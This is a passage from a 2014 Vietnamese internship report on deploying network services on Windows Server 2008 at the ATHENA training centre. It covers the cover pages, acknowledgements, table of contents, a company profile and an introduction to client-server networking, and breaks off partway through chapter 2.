Nguyenthithuhien_baocaothuctap

TRUNG TẦM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA

BÁO CÁO THỰC TẬP

NGHIÊN CỨU VÀ TRIỂN KHAI CÁC

DỊCH VỤ MẠNG TRÊN WINDOWS

SERVER 2008

TP. Hồ Chí Minh, Tháng 3 năm 2014.

GV Hướng Dẫn: Võ Đỗ Thắng

Sinh Viên: Nguyễn Thị Thu Hiền

MSSV: 1031102002

TRUNG TÂM ĐÀO TẠO MẠNG VÀ

AN NINH MẠNG QUỐC TẾ ATHENA

CÔNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lâp – Tự do – Hạnh phúc

NHIỆM VỤ THỰC HIỆN KHÓA LUẬN

Họ tên SV : Nguyễn Thị Thu Hiền. MSSV: 1031102002.Chuyên ngành: Công Nghệ Thông Tin.Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.Nội dung thực hiện:Lý thuyết:Nắm vững các bước thực hiện quản trị Windows Server 2008.Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các phương pháp bảo vệ.Thực hành: Cài đặt Windows Server 2008.Nâng cấp Stand Alone thành Domain controller.Cài đặt Windows 7.Join Domain cho windows 7.Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi ngày giờ hệ thống.Backup cho Domain Controller.Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.Bảo mật Windows với khai thác mã lỗi trên Windows Xp và trên VPS(MS10_042 , MS12_004.)Thời gian thực hiện: 24/02/2014 đến 4/4/2014.Chữ ký của SV:

TP.HCM, Ngày 3 tháng 3 năm 2014GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƯỚNG DẪN

(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên

LỜI CẢM ƠN

Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông Tin - Trường Đại Học Công Nghệ Thông Tin Gia Định Thành Phố Hồ Chí Minh đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho chúng em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần nữa, em xin chân thành cảm ơn thầy.Bài báo cáo được thực hiện trong khoảng thời gian gần 2 tháng. Bước đầu đi vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.Trân trọng.

TP.HCM, Ngày 4 - 4 - 2014

Sinh viên thực hiện

Nguyễn Thị Thu Hiền.

MỤC LỤCCHƯƠNG 1: CÔNG VIỆC THỰC TẬP..................................................................9

I. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.......................................9

1. Trụ sở và các chi nhánh:.............................................................10

1.1. Trụ sở chính:........................................................................10

1.2. Cơ sở 2_Tại TP Hồ Chí Minh:.............................................10

2. Quá trình hình thành và phát triển của trung tâm:......................10

3. Cơ cấu tổ chức:............................................................................12

4. Các sản phẩm, giải pháp:............................................................12

4.1 Các khóa học dài hạn:...........................................................12

4.2 Các khóa học ngắn hạn:........................................................12

4.3 Các sản phẩm khác................................................................13

4.4 Cơ sở hạ tầng.........................................................................13

4.5 Các dịch vụ hỗ trợ:................................................................13

5. Khách hàng..................................................................................14

6. Đối tác.........................................................................................14

II. CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP. .14

III. CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG.................14

IV. THỜI GIAN THỰC TẬP.............................................................14

CHƯƠNG 2: NÔI DUNG THỰC TẬP..................................................................14

I. Nhiệm vụ được giao.........................................................................14

II. Kiến thức tìm hiểu..........................................................................15

1. Giải pháp mạng doanh nghiệp.....................................................15

1.1. Giới thiệu về mạng doanh nghiệp........................................15

1.2. Các thành phần công nghệ trong mạng doanh nghiệp.........15

2. Windows Server 2008.................................................................15

Giới thiệu về mô hình Client-Server..............................................15

CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008...............................17

I. GIỚI THIỆU WINDOWS SERVER 2008......................................17

II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008................18

1. Công cụ quản trị Server Manager...............................................18

2. Windows Server Core.................................................................19

3. PowerShell..................................................................................19

4. Windows Deloyment Services....................................................20

5. Terminal Services........................................................................20

6. Network Access Protection.........................................................20

7. Read-Only Domain Controllers..................................................21

8. Công nghệ Failover Clustering...................................................21

9. Windows Firewall with Advance Security.................................22

III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008.............................................................................................................22

1. Công nghệ ảo hóa Hyper-V.........................................................22

2. Processor Compatibility Mode....................................................23

3. File Classification Infrastructure.................................................23

4. Quản lý trong ỗ đĩa và file:.........................................................23

5. Cải tiến giao thức và mã hóa.......................................................23

6. Một số tính năng khác.................................................................23

IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008......................24

1. Web.............................................................................................24

2. Ảo hóa :.......................................................................................24

3. Bảo mật:......................................................................................25

3.1. Network Access Protection (NAP):.....................................25

3.2. Read-Only Domain Controller (RODC):.............................25

3.3. BitLocker:............................................................................25

3.4. Windows Firewall:...............................................................26

V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008.................26

2. Windows Server 2008 Standard Edition.....................................26

3. Windows Server 2008 Enterprise Edition...................................26

4. Windows Server 2008 Datacenter Edition..................................27

5. Windows Web Server 2008........................................................27

CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008............................................28

I. YÊU CẦU PHẦN CỨNG...............................................................28

II. CÁC CÁCH CÀI ĐẶT...................................................................28

III. NÂNG CẤP LÊN WINDOWS SERVER 2008............................29

IV. CÀI ĐẶT WINDOWS SERVER 2008........................................29

CHƯƠNG 5: DỰNG DOMAIN CONTROLLER.................................................35

CHƯƠNG 6: JOIN DOMAIN.................................................................................46

CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG...........................................49

I. DỊCH VỤ DNS................................................................................49

1. Giới thiệu về DNS.......................................................................49

2. Cài đặt DNS................................................................................50

3. Cấu hình DNS.............................................................................51

II. GIỚI THIỆU DỊCH VỤ DHCP.....................................................60

1. Hoạt động của giao thức..............................................................60

2. Cài đặt trên windows server 2008..............................................60

3. Cấu hình DHCP...........................................................................65

3.1. Tạo Scop..............................................................................65

3.2 Thay đổi options của Scope..................................................67

CHƯƠNG 8: BACKUP..........................................................................................68

Backup với Windows Server Backup......................................................................69

Cài đặt Windows Server Backup.............................................................................69

1. Cài đặt Windows Server Backup sử dụng Server Manager........69

2. Cài đặt Windows Server Backup sử dụng Servermanagercmd.exe.........................................................................................................73

3. Cài đặt Windows Server Backup sử dụng PowerShell...............73

4. BACKUP windows thông thường...............................................74

CHƯƠNG 9: IIS-WEB-FTP..................................................................................90

I. Tiến hành cài đặt web iis và FTP.....................................................90

II. cấu hình Web IIS............................................................................94

III. cấu hình FTP.................................................................................98

CHƯƠNG 10: MAIL............................................................................................107

I. Chuẩn bị:........................................................................................107

II. Tiến hành cài đặt MDeamon v10.................................................107

III. tiến hành gửi nhận mail...............................................................112

CHƯƠNG 11: MÔ HÌNH MULTIMASTER.......................................................120

I. Replication Multimaster.(..............................................................120

II. cấu hình Multimaster....................................................................121

1. chuẩn bị.....................................................................................121

2. cấu hình.....................................................................................121

3. join domain PC2 vào PC1.........................................................122

3. tiến hành nâng cấp domain cho PC1.........................................128

4. Kiểm tra đồng bộ PC2 và PC1..................................................136

CHƯƠNG 12: TRIỂN KHAI VPN.......................................................................138

I. Tìm hiểu VPN................................................................................138

1. Khái niệm..................................................................................139

2. Các loại VPN.............................................................................140

3.Bảo mật trong VPN....................................................................140

4.Sản phẩm công nghệ dành cho VPN..........................................141

5. Bộ xử lý trung tâm VPN...........................................................142

6. Router dùng cho VPN...............................................................142

7. Tường lửa PIX của Cisco..........................................................142

II. VPN client to site..........................................................................143

1. Cài đặt.......................................................................................143

III.VPN SITE TO SITE.....................................................................163

1. chuẩn bị:....................................................................................163

2. Đặt IP cho 4 máy.......................................................................163

3. Tiến hành cấu hình trên 2 server...............................................165

4. Kiểm tra.....................................................................................193

CHƯƠNG 13: TRIỂN KHAI VPN TRÊN VPS...................................................193

I. Cấu hình VPN................................................................................193

II. Cài đặt VPN cho client.................................................................200

1. Client xp1..................................................................................200

2. Client xp 2.................................................................................206

III. Kiểm tra.......................................................................................212

CHƯƠNG 14: MAIL TRÊN VPS.........................................................................212

I. Cài đặt MDmoon v10....................................................................212

II. Cấu hình MDmoon v10................................................................212

1. khởi động MDmoon v10...........................................................212

2. Kiểm tra Domain.......................................................................213

3. Tạo Account..............................................................................214

CHƯƠNG 15: WEB TRÊN VPS..........................................................................218

I. Cài đặt............................................................................................218

1. Chạy xampp..............................................................................218

2. Tạo xampp.................................................................................222

II. thiết kế web: nguyenthithuhien.tk/athena.....................................223

CHƯƠNG 16: THIẾT KẾ WEB BẰNG JOOMLA.............................................228

1. Cài đặt joomla...........................................................................228

2. thiết kế trang chủ.......................................................................231

3. Tạo template admin...................................................................235

4. Tạo bài viết................................................................................236

5.Tạo menu....................................................................................239

6. Hướng dẫn đưa manu ra trang chủ............................................243

7. Cài đặt và hiển thị module trình diển ảnh.................................245

8. Cài đặt và hiển thị tin tức cập nhật............................................249

9. Cập nhật tin tức cho website.....................................................250

10. Cài đặt và hiển thị tin tức mới nhất.........................................253

11. Hiển thị doanh mục tin tức......................................................256

12. Tạo thư mục hỗ trợ Online......................................................261

13. Tạo thư mục địa chỉ cho Athena............................................263

CHƯƠNG 17: BẢO MẬT WINDOWS................................................................264

I. Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042.........264

II. Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004................270

CHƯƠNG 18: KẾT LUẬN...................................................................................275

I.Các kết quả đạt được.......................................................................275

II. Kinh nghiệm thực tế.....................................................................275

III. Hoàn thiện bản thân....................................................................276

IV. Các kiến thức được lĩnh hội........................................................276

V. Kết luận........................................................................................276

VI. Tài liệu tham khảo......................................................................277

LỜI MỞ ĐẦU

Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.

Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.

Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.

Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.

Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản thân mình hơn. Xin chân thành cảm ơn!

Trung Tâm Đào Tạo & Dịch Vụ Mạng Athena BÁO CÁO THỰC TẬP

CHƯƠNG 1: CÔNG VIỆC THỰC TẬP.

I. Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền

thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết

tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép

kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng

11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING

NETWORK SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt

huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào

công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung

chủ yếu vào các họat động sau:

Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất

kinh doanh.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ

liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố

máy tính.

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

9Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008


Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...

1. Trụ sở và các chi nhánh:

1.1. Trụ sở chính: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041

Hotline: 0943 23 00 99.

1.2. Cơ sở 2_Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.Athena.Edu.Vn

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 20 00 88.

2. Quá trình hình thành và phát triển của trung tâm:

Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.


http://www.Athena.Edu.Vn/


Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung

tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ

thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các

chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử, bảo mật

web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học. Đòi hỏi cấp

thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như

cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung,

các doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung cấp giải

pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn phòng đại diện tại

Đà Nẵng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm

một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng

viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công

nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này Athena có nhiều chính

sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các doanh

nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng. Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp,



trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 3. Cơ cấu tổ chức:

Hình 1. Sơ đồ tổ chức công ty.

4. Các sản phẩm, giải pháp:

4.1 Các khóa học dài hạn:- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security

specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.

4.2 Các khóa học ngắn hạn:Khóa Quản trị mạng :

- Quản trị mạng Microsoft căn bản ACBN

- Phần cứng máy tính, laptop, server

- Quản trị hệ thống mạng Microsoft MCSA Security.

- Quản trị mạng Microsoft nâng cao MCSE

- Quản trị window Vista

- Quản trị hệ thống Window Server 2008, 2012



- Lớp Master Exchange Mail Server

- Quản trị mạng quốc tế Cissco CCNA

- Quản trị hệ thống mạng Linux 1 và Linux 2.

Khóa thiết kế web và bảo mật mạng- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart

- Lập trình web với Php và MySQL

- Bảo mật mạng quốc tế ACNS

- Hacker mũ trắng

- Athena Mastering Firewall Security

- Bảo mật website.

4.3 Các sản phẩm khác- Chuyên đề thực hành sao lưu và phục hồi dữ liệu

- Chuyên đề thực hành bảo mật mạng Wi_Fi

- Chuyên đề Ghost qua mạng

- Chuyên đề xây dựng và quản trị diễn đàn

- Chuyên đề bảo mật dữ liệu phòng chống nội gián

- Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thương mại điện tử.

4.4 Cơ sở hạ tầng- Thiết bị đầy đủ và hiện đại.

- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công nghệ mới

nhất.

- Phòng máy rộng rãi, thoáng mát.

4.5 Các dịch vụ hỗ trợ:- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

- Giới thiệu việc làm cho mọi học viên

- Thực tập có lương cho học viên khá giỏi

- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới hạn thời

gian



- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính, mạng

máy tính, bảo mật mạng

Hỗ trợ thi Chứng chỉ Quốc tế.

5. Khách hàng

- Mọi đối tượng chuyên hoặc không chuyên về CNTT.- Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ công

nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

6. Đối tác

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính...

II. CÁC NHIỆM VỤ VÀ DỊCH VỤ CỦA BỘ PHẬN THỰC TẬP

Bộ phận thực tập : Bộ phận triển khai kỹ thuật.

Nhiệm vụ và dịch vụ:

Triển khai lắp đặt hệ thống mạng.

Bảo trì hệ thống mạng.

Tư vấn hỗ trợ quản trị hệ thống mạng.

III. CÔNG VIỆC VÀ NHIỆM VỤ ĐƯỢC PHÂN CÔNG

Nghiên cứu các dịch vụ mạng trên Windows Server 2008.

Triển khai các dịch vụ mạng trên Windows Server 2008.

Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.

IV. THỜI GIAN THỰC TẬP

Từ ngày 24/02/2014 đến ngày 04/04/2014.

CHƯƠNG 2: NÔI DUNG THỰC TẬP.

I. Nhiệm vụ được giao. Nghiên cứu các dịch vụ mạng trên Windows Server 2008

Triển khai các dịch vụ mạng trên Windows Server 2008



II. Kiến thức tìm hiểu

1. Giải pháp mạng doanh nghiệp

1.1. Giới thiệu về mạng doanh nghiệpHệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và

loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều sự chọn lựa

cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản lý hoặc sử dụng dịch

vụ. Những doanh nghiệp lớn với hàng ngàn máy tính cũng có những giải pháp quản lý

đặc thù kết hợp cả phần cứng và phần mềm.

Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ thông tin

(CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu cầu khác nhau về quản

trị hệ thống mạng (network) của doanh nghiệp. Một hệ thống được kiểm soát tốt sẽ làm

giảm đáng kể chi phí hoạt động, nâng cao hiệu quả cũng như độ tin cậy của hệ thống.

1.2. Các thành phần công nghệ trong mạng doanh nghiệpTùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp công

nghệ và thiết kế sao cho phù hợp nhất.

Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ thống và

băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát mạng. Vậy làm thế nào

để một doanh nghiệp vừa và nhỏ, với một số vốn đầu tư ban đầu hạn chế, có thể tiếp cận

được với các công nghệ hiện đại, bắt kịp sự phát triển của thế giới.

2. Windows Server 2008

Giới thiệu về mô hình Client-Server

Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc

thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào các máy

trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer không cung cấp cho

bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy, không có gì ngạc nhiên khi họ

thường có vấn đề với việc truy cập vào máy trạm, bị mất dữ liệu do virus, spyware hay

phải trải nghiệm việc internet bị gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer

là đủ khi bạn chỉ có một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6

người sử dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.



Vậy lợi ích của mô hình Client-Server cụ thể là gì?

- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là an ninh

mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá nhân và nhóm, có

thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được lưu trữ trên mạng, ngăn chặn

người sử dụng trái phép truy cập tài liệu mà họ không nên xem. Ví dụ, trong Folder

chung thì group ketoan và group nhansu có quyền truy cập ủa nhân viên…

- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị nguồn

điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song song, sự mất mát

của một trong những nguồn cung cấp điện không ảnh hưởng đến hoạt động hệ thống bình

thường. Cũng vậy với hệ thống lưu trữ của máy chủ. Không giống như một máy tính để

bàn trung bình có sử dụng một ổ cứng duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ

đĩa cứng làm việc trong một RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián

đoạn trong quy trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot

swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng cho phép

bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn phòng. Ngoài ra, kể từ khi

tất cả các dữ liệu nhân viên đang được lưu trữ trên mạng, nếu máy trạm của người dùng

không giữa ngày làm việc, nhân viên có thể truy cập các tập tin tương tự từ máy trạm

khác.

- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất cả người

dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay từ bàn làm việc,

tăng hiệu quả. Một số trong những nguồn tài nguyên bao gồm:

o Tập trung lưu trữ dữ liệu ( RAID Array )

o Network Attached Storage (NAS) thiết bị

